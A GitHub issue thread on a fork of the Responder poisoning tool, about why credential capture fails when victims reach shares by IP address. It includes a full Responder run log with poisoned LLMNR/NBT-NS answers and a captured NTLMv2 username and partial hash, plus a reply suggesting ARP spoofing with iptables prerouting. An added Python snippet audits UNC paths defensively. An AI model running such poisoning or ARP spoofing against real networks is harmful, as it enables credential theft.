forked from SpiderLabs/Responder
Does not work when the victim uses the IP address to access the shared folders #280
Comments
Who said it should?
If you want to catch those, you'll need to ARP with prerouting iptables rules.
Disruption will therefore occur.
On Tue, Jul 2, 2024, 8:31 PM MiMaz7707 <***@***.***> wrote:
Hello,
it works fine if the victim uses a hostname in the UNC path, but it doesn't if the victim uses the server IP address or the FQDN.
LLMNR is a name resolution protocol; there is no name to resolve when you use an IP.
Hello, I get it, so it needs to do a MiTM attack to get a response from victims that use an IP address. Thanks.
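The point made in the reply above (LLMNR only comes into play when there is a name to resolve), as an added example that is not part of the original thread or of Responder: an audit helper that classifies the server part of UNC paths, so single-label names in scripts or drive mappings can be found and replaced. The function names, the constructed sample paths and the simplified three-way resolution model are assumptions of this example.

```python
import ipaddress
import re

# Simplified model of Windows name resolution (an assumption of this example):
#   ip-literal   -> nothing to resolve, so no LLMNR/NBT-NS query is ever sent
#   fqdn         -> multi-label name, resolved through unicast DNS
#   single-label -> may fall back to LLMNR/NBT-NS when DNS has no answer
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\/]+)(?:[\\/].*)?$")

def unc_host(path):
    """Return the server component of a UNC path, or None if it is not one."""
    m = UNC_RE.match(path.strip())
    return m.group("host") if m else None

def is_ip_literal(host):
    # Windows writes IPv6 addresses in UNC paths as fe80--1.ipv6-literal.net,
    # with '-' standing for ':' and 's' introducing the zone id.
    suffix = ".ipv6-literal.net"
    host = host.lower()
    if host.endswith(suffix):
        host = host[:-len(suffix)].split("s")[0].replace("-", ":")
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def classify(path):
    host = unc_host(path)
    if host is None:
        return "not-unc"
    if is_ip_literal(host):
        return "ip-literal"
    if "." in host.rstrip("."):
        return "fqdn"
    return "single-label"

def exposed_paths(paths):
    """Paths whose server name can fall back to multicast name resolution."""
    return [p for p in paths if classify(p) == "single-label"]

# Constructed sample input; the host names below are not taken from a real network.
SAMPLE = [
    r"\\S\share",
    r"\\192.168.117.10\share",
    r"\\fileserver.mylab.example\share",
    r"\\fe80--4980-feb4-6fae-992d.ipv6-literal.net\share",
]

if __name__ == "__main__":
    for p in SAMPLE:
        print(f"{classify(p):13} {p}")
```

Only the first sample path is reported by `exposed_paths`, which matches the behaviour described in the issue: the hostname form produces poisonable LLMNR/NBT-NS queries, the IP form produces none.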
Hello,
it works fine if the victim uses a hostname in the UNC path, but it doesn't if the victim uses the server IP address or the FQDN.
```
responder -I eth0 -dwv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR [ON]
    NBT-NS [ON]
    MDNS [ON]
    DNS [ON]
    DHCP [ON]

[+] Servers:
    HTTP server [ON]
    HTTPS server [ON]
    WPAD proxy [ON]
    Auth proxy [OFF]
    SMB server [ON]
    Kerberos server [ON]
    SQL server [ON]
    FTP server [ON]
    IMAP server [ON]
    POP3 server [ON]
    SMTP server [ON]
    DNS server [ON]
    LDAP server [ON]
    MQTT server [ON]
    RDP server [ON]
    DCE-RPC server [ON]
    WinRM server [ON]
    SNMP server [OFF]

[+] HTTP Options:
    Always serving EXE [OFF]
    Serving EXE [OFF]
    Serving HTML [OFF]
    Upstream Proxy [OFF]

[+] Poisoning Options:
    Analyze Mode [OFF]
    Force WPAD auth [OFF]
    Force Basic Auth [OFF]
    Force LM downgrade [OFF]
    Force ESS downgrade [OFF]

[+] Generic Options:
    Responder NIC [eth0]
    Responder IP [192.168.117.200]
    Responder IPv6 [fe80::9024:b852:9137:c6f]
    Challenge set [random]
    Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name [WIN-OE0U3JW4FXX]
    Responder Domain Name [WYT3.LOCAL]
    Responder DCE-RPC Port [46345]

[+] Listening for events...

[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[*] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d
[SMB] NTLMv2-SSP Username : MYLAB\test
[SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac[...]
```